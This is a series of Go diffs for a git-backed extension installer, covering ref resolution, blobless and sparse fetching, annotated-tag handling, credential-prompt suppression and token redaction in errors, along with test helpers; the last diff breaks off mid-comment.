+// newFakeFetcher writes files into a temp dir and serves them as one commit.
+func newFakeFetcher(t *testing.T, commit string, files map[string]string) *fakeFetcher {
+	t.Helper()
+	dir := t.TempDir()
+	names := make([]string, 0, len(files))
+	for rel, content := range files {
+		writeFixture(t, filepath.Join(dir, filepath.FromSlash(rel)), content, 0o644)
+		names = append(names, rel)
+	}
+	sort.Strings(names)
+	return &fakeFetcher{repo: &fakeRepo{dir: dir, commit: commit, ref: "main", refType: RefTypeBranch, files: names}}
+}
+
+// testEnv builds an Env rooted in a temp home with empty built-in extension
+// dirs, so installs and validation see only what a test puts there.
+func testEnv(t *testing.T, fetcher Fetcher, stdin string) (Env, *bytesBuffer) {
+	t.Helper()
+	root := t.TempDir()
+	paths := model.Paths{
+		ToolsDir:          filepath.Join(root, "app", "extensions", "tools"),
+		FeaturesDir:       filepath.Join(root, "app", "extensions", "features"),
+		UserExtensionsDir: filepath.Join(root, "home", ".config", "enclave", "extensions"),
+		UserToolsDir:      filepath.Join(root, "home", ".config", "enclave", "extensions", "tools"),
+		UserFeaturesDir:   filepath.Join(root, "home", ".config", "enclave", "extensions", "features"),
+	}
+	for _, dir := range []string{paths.ToolsDir, paths.FeaturesDir, paths.UserToolsDir, paths.UserFeaturesDir} {
+		if err := os.MkdirAll(dir, 0o750); err != nil {
+			t.Fatalf("mkdir %s: %v", dir, err)
+		}
+	}
+	out := &bytesBuffer{}
+	return Env{
+		Paths:     paths,
+		Home:      filepath.Join(root, "home"),
+		Fetcher:   fetcher,
+		Stdin:     stringReader(stdin),
+		Narration: out,
+		Now:       func() time.Time { return time.Date(2026, 8, 26, 10, 15, 0, 0, time.UTC) },
+		Version:   "enclave test",
+	}, out
+}
+
+// assertResultsDoNotNameExtensions is the invariant guard for per-extension
+// error text: ActionResult.Name is the only place an extension is named, so a
+// caller can prefix it onto Error unconditionally.
+func assertResultsDoNotNameExtensions(t *testing.T, results []ActionResult) {
+	t.Helper()
+	for _, result := range results {
+		if result.Name == "" || result.Error == "" {
+			continue
+		}
+		if strings.Contains(result.Error, result.Name) {
+			t.Errorf("error for %q repeats the extension name: %q", result.Name, result.Error)
+		}
+	}
+}
+
+func fmtResults(results []ActionResult) string {
+	parts := make([]string, 0, len(results))
+	for _, result := range results {
+		parts = append(parts, fmt.Sprintf("%s=%s(%s)", result.Name, result.Action, result.Error))
+	}
+	return fmt.Sprint(parts)
+}
+
+type bytesBuffer = bytes.Buffer
+
+func stringReader(value string) io.Reader { return strings.NewReader(value) }

--- a/internal/extinstall/fetch.go
+++ b/internal/extinstall/fetch.go
@@ -334,12 +334,8 @@ func (r *gitRepo) init(ctx context.Context, remote string, resolved RemoteRef) e
 	// full fetch anyway and only warns on stderr. Both mean the filter did
 	// not apply, so both are detected before trusting r.blobless.
 	_, filterStderr, err := r.fetcher.runCombined(ctx, r.dir, "fetch", "--depth", "1", "--no-tags", "--filter=blob:none", "origin", fetchRef)
-	if err == nil && !filterIgnoredByServer(filterStderr) {
-		r.blobless = true
-		return r.verifyCommit(ctx, resolved)
-	}
 	if err == nil {
-		// The fetch already transferred full objects; nothing more to do.
+		r.blobless = !filterIgnoredByServer(filterStderr)
 		return r.verifyCommit(ctx, resolved)
 	}
 	// Server refuses object filters (uploadpack.allowFilter off): shallow fetch
@@ -429,10 +425,14 @@ func (r *gitRepo) Materialize(ctx context.Context, dirs []string) error {
 			r.sparse = true
 			return nil
 		}
-		// A half-applied sparse attempt leaves sparsity enabled with the default
-		// cone, which would reduce the full checkout below to the root files.
-		_, _ = r.fetcher.run(ctx, r.dir, "sparse-checkout", "disable")
 	}
+	// Sparsity may still be enabled here: from a half-applied attempt just
+	// above, or from an earlier Materialize on this repository, which the fetch
+	// cache shares across every extension from the same remote and ref. Either
+	// way its cone would silently reduce the full checkout below to a subset of
+	// the tree, so it is turned off before checking out.
+	_, _ = r.fetcher.run(ctx, r.dir, "sparse-checkout", "disable")
+	r.sparse = false
 	_, err := r.fetcher.run(ctx, r.dir, "checkout", "--detach", r.checkoutTarget)
 	return err
 }
@@ -478,7 +478,10 @@ func (f *gitFetcher) runCombined(ctx context.Context, dir string, args ...string
 		if detail == "" {
 			detail = runErr.Error()
 		}
-		return "", stderrBuf.String(), fmt.Errorf("git %s: %s", strings.Join(args, " "), RedactRemote(detail))
+		// Both halves are redacted: args carries the remote for ls-remote and
+		// `remote add origin`, so a token in the URL would otherwise reach the
+		// error string and the --json envelope with it.
+		return "", stderrBuf.String(), fmt.Errorf("git %s: %s", RedactRemote(strings.Join(args, " ")), RedactRemote(detail))
 	}
 	return stdoutBuf.String(), stderrBuf.String(), nil
 }

--- a/internal/extinstall/fetch.go
+++ b/internal/extinstall/fetch.go
@@ -21,7 +21,9 @@ import (
 // ErrGitMissing reports that the host has no git binary.
 var ErrGitMissing = errors.New("git was not found on PATH; install git to add or update extensions")
 
-var fullSHAPattern = regexp.MustCompile(`^[0-9a-f]{40}$`)
+// fullSHAPattern matches a full object name in either hash: 40 hex digits for
+// SHA-1, 64 for a SHA-256 repository.
+var fullSHAPattern = regexp.MustCompile(`^([0-9a-f]{40}|[0-9a-f]{64})$`)
 
 // RemoteRef is a resolved remote reference.
 type RemoteRef struct {
@@ -115,20 +117,28 @@ func (c *fetchCache) close() {
 	c.repos = map[fetchKey]Repo{}
 }
 
-type gitFetcher struct{ git string }
+type gitFetcher struct {
+	git          string
+	allowPrompts bool
+}
 
-func NewGitFetcher() (Fetcher, error) {
+// NewGitFetcher returns a Fetcher backed by the host's git. Without prompts,
+// git may not ask for credentials on the terminal: a private remote then fails
+// with git's own message instead of blocking a run whose report is a JSON
+// envelope nobody is watching.
+func NewGitFetcher(allowPrompts bool) (Fetcher, error) {
 	path, err := exec.LookPath("git")
 	if err != nil {
 		return nil, ErrGitMissing
 	}
-	return &gitFetcher{git: path}, nil
+	return &gitFetcher{git: path, allowPrompts: allowPrompts}, nil
 }
 
 // ResolveRef resolves ref to a commit with one network round trip and no
 // repository data transferred. An empty ref resolves the remote HEAD and
 // reports the branch it points at, so an install records a branch to follow
-// rather than a moving HEAD. A full SHA needs no network at all.
+// rather than a moving HEAD; a HEAD that names no branch is pinned to its
+// commit instead (see parseSymrefHead). A full SHA needs no network at all.
 func (f *gitFetcher) ResolveRef(ctx context.Context, remote string, ref string) (RemoteRef, error) {
 	trimmed := strings.TrimSpace(ref)
 	if trimmed == "" {
@@ -215,9 +225,11 @@ func parseSymrefHead(out string, remote string) (RemoteRef, error) {
 		return RemoteRef{}, fmt.Errorf("%s has no HEAD", RedactRemote(remote))
 	}
 	if result.Ref == "" {
-		// A remote HEAD that is not symbolic (rare) still gives a usable commit.
-		result.Ref = "HEAD"
-		return result, nil
+		// A remote HEAD that is not symbolic names no branch to follow — a local
+		// clone with a detached HEAD, most often. Recording "HEAD" as the ref
+		// would leave update looking for a branch or tag of that name forever, so
+		// the install is pinned to the commit HEAD is at instead.
+		return RemoteRef{Commit: result.Commit, Ref: result.Commit, RefType: RefTypeCommit}, nil
 	}
 	// The branch name came from the remote's own advertisement and is about to
 	// be used as a bare git operand, so it is untrusted regardless of the
@@ -460,7 +472,7 @@ func (f *gitFetcher) runCombined(ctx context.Context, dir string, args ...string
 	var stdoutBuf, stderrBuf bytes.Buffer
 	cmd.Stdout = &stdoutBuf
 	cmd.Stderr = &stderrBuf
-	cmd.Env = append(os.Environ(), "GIT_ADVICE=0")
+	cmd.Env = f.env()
 	if runErr := cmd.Run(); runErr != nil {
 		detail := strings.TrimSpace(stderrBuf.String())
 		if detail == "" {
@@ -469,6 +481,20 @@ func (f *gitFetcher) runCombined(ctx context.Context, dir string, args ...string
 		return "", stderrBuf.String(), fmt.Errorf("git %s: %s", strings.Join(args, " "), RedactRemote(detail))
 	}
 	return stdoutBuf.String(), stderrBuf.String(), nil
+}
+
+// env is the environment for a git invocation. Silencing the credential
+// question takes both variables: git asks an askpass program first (a VS Code
+// terminal exports GIT_ASKPASS, which opens a dialog), and an empty
+// GIT_ASKPASS ends that search before core.askpass and SSH_ASKPASS are
+// consulted, leaving the terminal that GIT_TERMINAL_PROMPT closes. Credential
+// helpers still answer, and an ssh key passphrase is ssh's own prompt.
+func (f *gitFetcher) env() []string {
+	env := append(os.Environ(), "GIT_ADVICE=0")
+	if !f.allowPrompts {
+		env = append(env, "GIT_TERMINAL_PROMPT=0", "GIT_ASKPASS=")
+	}
+	return env
 }
 
 // filterIgnoredByServer reports whether git silently answered a

--- a/internal/extinstall/fetch.go
+++ b/internal/extinstall/fetch.go
@@ -1,0 +1,488 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"bytes"
+	"context"
+	"errors"
+	"fmt"
+	"os"
+	"os/exec"
+	"regexp"
+	"strings"
+)
+
+// ErrGitMissing reports that the host has no git binary.
+var ErrGitMissing = errors.New("git was not found on PATH; install git to add or update extensions")
+
+var fullSHAPattern = regexp.MustCompile(`^[0-9a-f]{40}$`)
+
+// RemoteRef is a resolved remote reference.
+type RemoteRef struct {
+	Commit  string
+	Ref     string
+	RefType string
+}
+
+// Repo is a fetched repository at one commit. Files lists the whole tree
+// without any file content having been downloaded; Materialize downloads the
+// content of the named directories only.
+type Repo interface {
+	Commit() string
+	Ref() string
+	RefType() string
+	Files() []string
+	Materialize(ctx context.Context, dirs []string) error
+	Dir() string
+	Close()
+}
+
+// Fetcher retrieves repositories.
+type Fetcher interface {
+	ResolveRef(ctx context.Context, remote string, ref string) (RemoteRef, error)
+	Open(ctx context.Context, remote string, ref string) (Repo, error)
+	// OpenAt fetches a reference that is already resolved, so a caller that
+	// had to resolve it first — to decide whether a fetch is needed at all —
+	// does not pay for a second round trip.
+	OpenAt(ctx context.Context, remote string, resolved RemoteRef) (Repo, error)
+}
+
+// fetchKey identifies one remote reference within a single command.
+type fetchKey struct {
+	remote string
+	ref    string
+}
+
+// fetchCache serves one resolved reference and one fetched repository per
+// (remote, ref) for the duration of one command. Several extensions commonly
+// come from a single kit repository at a single ref, and without this each of
+// them would resolve and clone that repository again. Failures are not cached:
+// each extension reports its own.
+type fetchCache struct {
+	fetcher Fetcher
+	refs    map[fetchKey]RemoteRef
+	repos   map[fetchKey]Repo
+}
+
+func newFetchCache(fetcher Fetcher) *fetchCache {
+	return &fetchCache{
+		fetcher: fetcher,
+		refs:    map[fetchKey]RemoteRef{},
+		repos:   map[fetchKey]Repo{},
+	}
+}
+
+func (c *fetchCache) resolve(ctx context.Context, remote string, ref string) (RemoteRef, error) {
+	key := fetchKey{remote: remote, ref: ref}
+	if resolved, ok := c.refs[key]; ok {
+		return resolved, nil
+	}
+	resolved, err := c.fetcher.ResolveRef(ctx, remote, ref)
+	if err != nil {
+		return RemoteRef{}, err
+	}
+	c.refs[key] = resolved
+	return resolved, nil
+}
+
+// open returns the repository for an already-resolved reference, fetching it
+// on first use.
+func (c *fetchCache) open(ctx context.Context, remote string, resolved RemoteRef) (Repo, error) {
+	key := fetchKey{remote: remote, ref: resolved.Ref}
+	if repo, ok := c.repos[key]; ok {
+		return repo, nil
+	}
+	repo, err := c.fetcher.OpenAt(ctx, remote, resolved)
+	if err != nil {
+		return nil, err
+	}
+	c.repos[key] = repo
+	return repo, nil
+}
+
+// close discards every repository fetched through this cache. Callers must not
+// close a repository themselves: it may still be serving another extension.
+func (c *fetchCache) close() {
+	for _, repo := range c.repos {
+		repo.Close()
+	}
+	c.repos = map[fetchKey]Repo{}
+}
+
+type gitFetcher struct{ git string }
+
+func NewGitFetcher() (Fetcher, error) {
+	path, err := exec.LookPath("git")
+	if err != nil {
+		return nil, ErrGitMissing
+	}
+	return &gitFetcher{git: path}, nil
+}
+
+// ResolveRef resolves ref to a commit with one network round trip and no
+// repository data transferred. An empty ref resolves the remote HEAD and
+// reports the branch it points at, so an install records a branch to follow
+// rather than a moving HEAD. A full SHA needs no network at all.
+func (f *gitFetcher) ResolveRef(ctx context.Context, remote string, ref string) (RemoteRef, error) {
+	trimmed := strings.TrimSpace(ref)
+	if trimmed == "" {
+		out, err := f.run(ctx, "", "ls-remote", "--symref", remote, "HEAD")
+		if err != nil {
+			return RemoteRef{}, err
+		}
+		return parseSymrefHead(out, remote)
+	}
+	if fullSHAPattern.MatchString(trimmed) {
+		return RemoteRef{Commit: trimmed, Ref: trimmed, RefType: RefTypeCommit}, nil
+	}
+	// The requested ref reaches git as a bare fetch/ls-remote operand later, so
+	// it is validated here before any network round trip is made with it.
+	if err := validateRefName(trimmed); err != nil {
+		return RemoteRef{}, fmt.Errorf("requested ref %q: %w", trimmed, err)
+	}
+	out, err := f.run(ctx, "", "ls-remote", remote, "refs/heads/"+trimmed, "refs/tags/"+trimmed)
+	if err != nil {
+		return RemoteRef{}, err
+	}
+	resolved, ok := parseLsRemote(out, trimmed)
+	if !ok {
+		return RemoteRef{}, fmt.Errorf("%s has no branch or tag %q", RedactRemote(remote), trimmed)
+	}
+	return resolved, nil
+}
+
+// validateRefName rejects ref names that are unsafe to hand to git as a bare
+// command-line operand, or that violate git's own ref-name rules.
+func validateRefName(ref string) error {
+	if ref == "" {
+		return errors.New("ref name is empty")
+	}
+	if strings.HasPrefix(ref, "-") {
+		return errors.New("ref name looks like a command-line option")
+	}
+	if strings.Contains(ref, "..") {
+		return errors.New(`ref name contains ".."`)
+	}
+	if strings.HasPrefix(ref, "/") || strings.HasSuffix(ref, "/") {
+		return errors.New(`ref name has a leading or trailing "/"`)
+	}
+	if strings.HasSuffix(ref, ".") {
+		return errors.New(`ref name ends with "."`)
+	}
+	if strings.HasSuffix(ref, ".lock") {
+		return errors.New(`ref name ends with ".lock"`)
+	}
+	for _, r := range ref {
+		switch {
+		case r < 0x20 || r == 0x7f:
+			return errors.New("ref name contains a control character")
+		case r == ' ':
+			return errors.New("ref name contains a space")
+		case strings.ContainsRune(`~^:?*[\`, r):
+			return fmt.Errorf("ref name contains %q", string(r))
+		}
+	}
+	return nil
+}
+
+func parseSymrefHead(out string, remote string) (RemoteRef, error) {
+	result := RemoteRef{RefType: RefTypeBranch}
+	for _, line := range strings.Split(out, "\n") {
+		fields := strings.Fields(line)
+		if len(fields) < 2 {
+			continue
+		}
+		if fields[0] == "ref:" && strings.HasSuffix(fields[len(fields)-1], "HEAD") {
+			result.Ref = strings.TrimPrefix(fields[1], "refs/heads/")
+			continue
+		}
+		if fields[1] == "HEAD" {
+			result.Commit = fields[0]
+		}
+	}
+	if result.Commit == "" {
+		return RemoteRef{}, fmt.Errorf("%s has no HEAD", RedactRemote(remote))
+	}
+	if result.Ref == "" {
+		// A remote HEAD that is not symbolic (rare) still gives a usable commit.
+		result.Ref = "HEAD"
+		return result, nil
+	}
+	// The branch name came from the remote's own advertisement and is about to
+	// be used as a bare git operand, so it is untrusted regardless of the
+	// remote's reputation: a hostile server can name its HEAD branch anything,
+	// including a string that git would parse as a command-line option.
+	if err := validateRefName(result.Ref); err != nil {
+		return RemoteRef{}, fmt.Errorf("%s's HEAD names branch %q, which is unusable: %w", RedactRemote(remote), result.Ref, err)
+	}
+	return result, nil
+}
+
+func parseLsRemote(out string, ref string) (RemoteRef, bool) {
+	branch := RemoteRef{}
+	tag := RemoteRef{}
+	for _, line := range strings.Split(out, "\n") {
+		fields := strings.Fields(line)
+		if len(fields) != 2 {
+			continue
+		}
+		switch fields[1] {
+		case "refs/heads/" + ref:
+			branch = RemoteRef{Commit: fields[0], Ref: ref, RefType: RefTypeBranch}
+		case "refs/tags/" + ref:
+			tag = RemoteRef{Commit: fields[0], Ref: ref, RefType: RefTypeTag}
+		}
+	}
+	// A branch wins over a same-named tag, matching git's own precedence.
+	if branch.Commit != "" {
+		return branch, true
+	}
+	if tag.Commit != "" {
+		return tag, true
+	}
+	return RemoteRef{}, false
+}
+
+// Open resolves ref and fetches it.
+func (f *gitFetcher) Open(ctx context.Context, remote string, ref string) (Repo, error) {
+	resolved, err := f.ResolveRef(ctx, remote, ref)
+	if err != nil {
+		return nil, err
+	}
+	return f.OpenAt(ctx, remote, resolved)
+}
+
+// OpenAt performs a blobless shallow fetch: the commit and its trees arrive,
+// file content does not. Callers list the tree for free and then Materialize
+// only the directories they install.
+func (f *gitFetcher) OpenAt(ctx context.Context, remote string, resolved RemoteRef) (Repo, error) {
+	dir, err := os.MkdirTemp("", "enclave-extinstall-*")
+	if err != nil {
+		return nil, err
+	}
+	repo := &gitRepo{fetcher: f, dir: dir, ref: resolved}
+	if err := repo.init(ctx, remote, resolved); err != nil {
+		repo.Close()
+		return nil, err
+	}
+	// -z is what makes the listing exact: without it git C-quotes any path
+	// holding non-ASCII bytes (core.quotePath defaults to true), and a name with
+	// a leading or trailing space would not survive line trimming either.
+	files, err := f.run(ctx, dir, "ls-tree", "-r", "--name-only", "-z", repo.checkoutTarget)
+	if err != nil {
+		repo.Close()
+		return nil, err
+	}
+	repo.files = splitNUL(files)
+	return repo, nil
+}
+
+type gitRepo struct {
+	fetcher  *gitFetcher
+	dir      string
+	ref      RemoteRef
+	files    []string
+	blobless bool
+	sparse   bool
+	// checkoutTarget is the revision ls-tree, rev-parse, and checkout act on.
+	// It is FETCH_HEAD after a normal ref fetch, or a raw commit SHA after the
+	// pinned-commit fallback, which cannot use FETCH_HEAD at all (see
+	// fetchPinnedCommitFromDefaultBranch).
+	checkoutTarget string
+}
+
+func (r *gitRepo) init(ctx context.Context, remote string, resolved RemoteRef) error {
+	if _, err := r.fetcher.run(ctx, r.dir, "init", "-q"); err != nil {
+		return err
+	}
+	if _, err := r.fetcher.run(ctx, r.dir, "remote", "add", "origin", remote); err != nil {
+		return err
+	}
+
+	fetchRef := resolved.Ref
+	if resolved.RefType == RefTypeCommit {
+		fetchRef = resolved.Commit
+	}
+	r.checkoutTarget = "FETCH_HEAD"
+
+	// Preferred path: commit and trees only. A server that rejects the filter
+	// outright fails this fetch (non-zero exit); one that merely does not
+	// support it (e.g. uploadpack.allowFilter off) instead answers with a
+	// full fetch anyway and only warns on stderr. Both mean the filter did
+	// not apply, so both are detected before trusting r.blobless.
+	_, filterStderr, err := r.fetcher.runCombined(ctx, r.dir, "fetch", "--depth", "1", "--no-tags", "--filter=blob:none", "origin", fetchRef)
+	if err == nil && !filterIgnoredByServer(filterStderr) {
+		r.blobless = true
+		return r.verifyCommit(ctx, resolved)
+	}
+	if err == nil {
+		// The fetch already transferred full objects; nothing more to do.
+		return r.verifyCommit(ctx, resolved)
+	}
+	// Server refuses object filters (uploadpack.allowFilter off): shallow fetch
+	// everything at this commit instead.
+	_, plainErr := r.fetcher.run(ctx, r.dir, "fetch", "--depth", "1", "--no-tags", "origin", fetchRef)
+	if plainErr == nil {
+		return r.verifyCommit(ctx, resolved)
+	}
+	if resolved.RefType != RefTypeCommit {
+		return plainErr
+	}
+	// Server refuses fetch-by-sha too: fall back to the default branch and
+	// check the pinned commit out of it directly.
+	return r.fetchPinnedCommitFromDefaultBranch(ctx, resolved)
+}
+
+// fetchPinnedCommitFromDefaultBranch handles a server that refuses to fetch a
+// specific commit SHA directly: it fetches the default branch in full (a
+// shallow, depth-limited fetch may not include the pinned commit's history)
+// and confirms the pinned commit is actually present.
+//
+// FETCH_HEAD is a pseudoref that `git update-ref` refuses to write, so
+// checkoutTarget carries the commit SHA instead.
+func (r *gitRepo) fetchPinnedCommitFromDefaultBranch(ctx context.Context, resolved RemoteRef) error {
+	if _, err := r.fetcher.run(ctx, r.dir, "fetch", "--no-tags", "origin"); err != nil {
+		return err
+	}
+	if _, err := r.fetcher.run(ctx, r.dir, "cat-file", "-e", resolved.Commit+"^{commit}"); err != nil {
+		return fmt.Errorf("commit %s was not found after fetching the default branch: %w", ShortCommit(resolved.Commit), err)
+	}
+	r.checkoutTarget = resolved.Commit
+	return r.verifyCommit(ctx, resolved)
+}
+
+// verifyCommit adopts the commit the fetch landed on when a branch or tag moved
+// between ls-remote and fetch, and fails when an explicit commit pin was not
+// the commit fetched.
+func (r *gitRepo) verifyCommit(ctx context.Context, resolved RemoteRef) error {
+	out, err := r.fetcher.run(ctx, r.dir, "rev-parse", r.checkoutTarget)
+	if err != nil {
+		return err
+	}
+	fetched := strings.TrimSpace(out)
+	if resolved.Commit != "" && fetched != resolved.Commit {
+		if resolved.RefType == RefTypeCommit {
+			return fmt.Errorf("requested commit %s but fetched %s", ShortCommit(resolved.Commit), ShortCommit(fetched))
+		}
+		r.ref.Commit = fetched
+	}
+	if r.ref.Commit == "" {
+		r.ref.Commit = fetched
+	}
+	return nil
+}
+
+func (r *gitRepo) Commit() string  { return r.ref.Commit }
+func (r *gitRepo) Ref() string     { return r.ref.Ref }
+func (r *gitRepo) RefType() string { return r.ref.RefType }
+func (r *gitRepo) Files() []string { return r.files }
+func (r *gitRepo) Dir() string     { return r.dir }
+
+func (r *gitRepo) Close() {
+	if r.dir != "" {
+		_ = os.RemoveAll(r.dir)
+	}
+}
+
+// Materialize checks out only dirs. With a blobless fetch this downloads their
+// blobs and nothing else; when sparse checkout is unavailable it falls back to
+// a full checkout of the fetched commit. Every directory is validated before
+// it reaches git as a bare operand: dirs ultimately comes from an extension
+// request, which is untrusted the same way a remote-supplied ref is.
+func (r *gitRepo) Materialize(ctx context.Context, dirs []string) error {
+	normalized := make([]string, 0, len(dirs))
+	for _, dir := range dirs {
+		clean, err := normalizeSubpath(dir)
+		if err != nil {
+			return fmt.Errorf("materialize path %q: %w", dir, err)
+		}
+		if strings.HasPrefix(clean, "-") {
+			return fmt.Errorf("materialize path %q looks like a command-line option, refusing", dir)
+		}
+		normalized = append(normalized, clean)
+	}
+	if len(normalized) > 0 {
+		if err := r.trySparse(ctx, normalized); err == nil {
+			r.sparse = true
+			return nil
+		}
+		// A half-applied sparse attempt leaves sparsity enabled with the default
+		// cone, which would reduce the full checkout below to the root files.
+		_, _ = r.fetcher.run(ctx, r.dir, "sparse-checkout", "disable")
+	}
+	_, err := r.fetcher.run(ctx, r.dir, "checkout", "--detach", r.checkoutTarget)
+	return err
+}
+
+func (r *gitRepo) trySparse(ctx context.Context, dirs []string) error {
+	if _, err := r.fetcher.run(ctx, r.dir, "sparse-checkout", "init", "--cone"); err != nil {
+		return err
+	}
+	args := append([]string{"sparse-checkout", "set"}, dirs...)
+	if _, err := r.fetcher.run(ctx, r.dir, args...); err != nil {
+		return err
+	}
+	_, err := r.fetcher.run(ctx, r.dir, "checkout", "--detach", r.checkoutTarget)
+	return err
+}
+
+// run executes git with output captured. Errors carry git's stderr, with any
+// URL userinfo redacted so a token in a remote never reaches a log.
+func (f *gitFetcher) run(ctx context.Context, dir string, args ...string) (string, error) {
+	stdout, _, err := f.runCombined(ctx, dir, args...)
+	return stdout, err
+}
+
+// runCombined is like run but also returns stderr on success, so a caller can
+// inspect a warning git emits even when it exits zero (for example, silently
+// ignoring an object filter the server does not support).
+func (f *gitFetcher) runCombined(ctx context.Context, dir string, args ...string) (stdout, stderr string, err error) {
+	full := append([]string{"-c", "advice.detachedHead=false"}, args...)
+	// #nosec G204 -- the binary is resolved via LookPath. Every other argument
+	// is a fixed git subcommand/flag, a commit SHA matched against
+	// fullSHAPattern, a ref name that passed validateRefName (rejecting a
+	// leading "-" and git's other unsafe ref characters), or a repository
+	// path that passed normalizeSubpath and a leading-"-" check in
+	// Materialize; no caller-controlled value reaches git unvalidated.
+	cmd := exec.CommandContext(ctx, f.git, full...)
+	cmd.Dir = dir
+	var stdoutBuf, stderrBuf bytes.Buffer
+	cmd.Stdout = &stdoutBuf
+	cmd.Stderr = &stderrBuf
+	cmd.Env = append(os.Environ(), "GIT_ADVICE=0")
+	if runErr := cmd.Run(); runErr != nil {
+		detail := strings.TrimSpace(stderrBuf.String())
+		if detail == "" {
+			detail = runErr.Error()
+		}
+		return "", stderrBuf.String(), fmt.Errorf("git %s: %s", strings.Join(args, " "), RedactRemote(detail))
+	}
+	return stdoutBuf.String(), stderrBuf.String(), nil
+}
+
+// filterIgnoredByServer reports whether git silently answered a
+// --filter=blob:none fetch with full objects because the server does not
+// support object filtering (for example, uploadpack.allowFilter is off).
+// Such a fetch still exits zero, so the warning on stderr is the only signal.
+func filterIgnoredByServer(stderr string) bool {
+	return strings.Contains(stderr, "not recognized by server")
+}
+
+// splitNUL splits NUL-terminated git output into records, dropping the empty
+// one after the final terminator. Nothing is trimmed: every byte between two
+// NULs belongs to the path.
+func splitNUL(out string) []string {
+	records := make([]string, 0, strings.Count(out, "\x00"))
+	for _, record := range strings.Split(out, "\x00") {
+		if record != "" {
+			records = append(records, record)
+		}
+	}
+	return records
+}

--- a/internal/extinstall/fetch.go
+++ b/internal/extinstall/fetch.go
@@ -198,7 +198,12 @@ func parseSymrefHead(out string, remote string) (RemoteRef, error) {
 		if len(fields) < 2 {
 			continue
 		}
-		if fields[0] == "ref:" && strings.HasSuffix(fields[len(fields)-1], "HEAD") {
+		// The symref target has to be HEAD itself, not merely end in it. A
+		// local clone advertises refs/remotes/origin/HEAD alongside its own
+		// HEAD, and matching on the suffix pinned the install to
+		// refs/remotes/origin/<branch>: a ref name no later fetch resolves,
+		// and a stale tracking ref rather than the branch that moves.
+		if fields[0] == "ref:" && fields[len(fields)-1] == "HEAD" {
 			result.Ref = strings.TrimPrefix(fields[1], "refs/heads/")
 			continue
 		}

--- a/internal/extinstall/fetch.go
+++ b/internal/extinstall/fetch.go
@@ -156,7 +156,10 @@ func (f *gitFetcher) ResolveRef(ctx context.Context, remote string, ref string) 
 	if err := validateRefName(trimmed); err != nil {
 		return RemoteRef{}, fmt.Errorf("requested ref %q: %w", trimmed, err)
 	}
-	out, err := f.run(ctx, "", "ls-remote", remote, "refs/heads/"+trimmed, "refs/tags/"+trimmed)
+	// The peeled pattern is asked for explicitly: a filtered ls-remote does not
+	// advertise the "^{}" line on its own, and for an annotated tag that line
+	// carries the commit (see parseLsRemote).
+	out, err := f.run(ctx, "", "ls-remote", remote, "refs/heads/"+trimmed, "refs/tags/"+trimmed, "refs/tags/"+trimmed+"^{}")
 	if err != nil {
 		return RemoteRef{}, err
 	}
@@ -242,8 +245,7 @@ func parseSymrefHead(out string, remote string) (RemoteRef, error) {
 }
 
 func parseLsRemote(out string, ref string) (RemoteRef, bool) {
-	branch := RemoteRef{}
-	tag := RemoteRef{}
+	var branchCommit, tagObject, tagCommit string
 	for _, line := range strings.Split(out, "\n") {
 		fields := strings.Fields(line)
 		if len(fields) != 2 {
@@ -251,17 +253,26 @@ func parseLsRemote(out string, ref string) (RemoteRef, bool) {
 		}
 		switch fields[1] {
 		case "refs/heads/" + ref:
-			branch = RemoteRef{Commit: fields[0], Ref: ref, RefType: RefTypeBranch}
+			branchCommit = fields[0]
 		case "refs/tags/" + ref:
-			tag = RemoteRef{Commit: fields[0], Ref: ref, RefType: RefTypeTag}
+			tagObject = fields[0]
+		case "refs/tags/" + ref + "^{}":
+			tagCommit = fields[0]
 		}
 	}
 	// A branch wins over a same-named tag, matching git's own precedence.
-	if branch.Commit != "" {
-		return branch, true
+	if branchCommit != "" {
+		return RemoteRef{Commit: branchCommit, Ref: ref, RefType: RefTypeBranch}, true
 	}
-	if tag.Commit != "" {
-		return tag, true
+	// An annotated tag advertises its own object id under refs/tags/<ref> and
+	// the commit it points at on the peeled "^{}" line. What an install records
+	// is a commit, so the peeled line wins; a lightweight tag has no peeled
+	// line and its object id already is the commit.
+	if tagCommit == "" {
+		tagCommit = tagObject
+	}
+	if tagCommit != "" {
+		return RemoteRef{Commit: tagCommit, Ref: ref, RefType: RefTypeTag}, true
 	}
 	return RemoteRef{}, false
 }
@@ -370,25 +381,34 @@ func (r *gitRepo) fetchPinnedCommitFromDefaultBranch(ctx context.Context, resolv
 	return r.verifyCommit(ctx, resolved)
 }
 
-// verifyCommit adopts the commit the fetch landed on when a branch or tag moved
-// between ls-remote and fetch, and fails when an explicit commit pin was not
-// the commit fetched.
+// verifyCommit records the commit the fetch landed on, which also adopts a
+// branch or tag that moved between ls-remote and fetch, and fails when an
+// explicit object pin was not the object fetched. The two revisions differ for
+// an annotated tag, where the fetch lands on the tag object: the pin is checked
+// against the object, so a pin naming a tag object is still honored, while what
+// gets recorded is always the commit that object names.
 func (r *gitRepo) verifyCommit(ctx context.Context, resolved RemoteRef) error {
-	out, err := r.fetcher.run(ctx, r.dir, "rev-parse", r.checkoutTarget)
+	object, err := r.revParse(ctx, r.checkoutTarget)
 	if err != nil {
 		return err
 	}
-	fetched := strings.TrimSpace(out)
-	if resolved.Commit != "" && fetched != resolved.Commit {
-		if resolved.RefType == RefTypeCommit {
-			return fmt.Errorf("requested commit %s but fetched %s", ShortCommit(resolved.Commit), ShortCommit(fetched))
-		}
-		r.ref.Commit = fetched
+	if resolved.RefType == RefTypeCommit && object != resolved.Commit {
+		return fmt.Errorf("requested commit %s but fetched %s", ShortCommit(resolved.Commit), ShortCommit(object))
 	}
-	if r.ref.Commit == "" {
-		r.ref.Commit = fetched
+	commit, err := r.revParse(ctx, r.checkoutTarget+"^{commit}")
+	if err != nil {
+		return err
 	}
+	r.ref.Commit = commit
 	return nil
+}
+
+func (r *gitRepo) revParse(ctx context.Context, rev string) (string, error) {
+	out, err := r.fetcher.run(ctx, r.dir, "rev-parse", "--verify", rev)
+	if err != nil {
+		return "", err
+	}
+	return strings.TrimSpace(out), nil
 }
 
 func (r *gitRepo) Commit() string  { return r.ref.Commit }
@@ -464,9 +484,10 @@ func (f *gitFetcher) runCombined(ctx context.Context, dir string, args ...string
 	// #nosec G204 -- the binary is resolved via LookPath. Every other argument
 	// is a fixed git subcommand/flag, a commit SHA matched against
 	// fullSHAPattern, a ref name that passed validateRefName (rejecting a
-	// leading "-" and git's other unsafe ref characters), or a repository
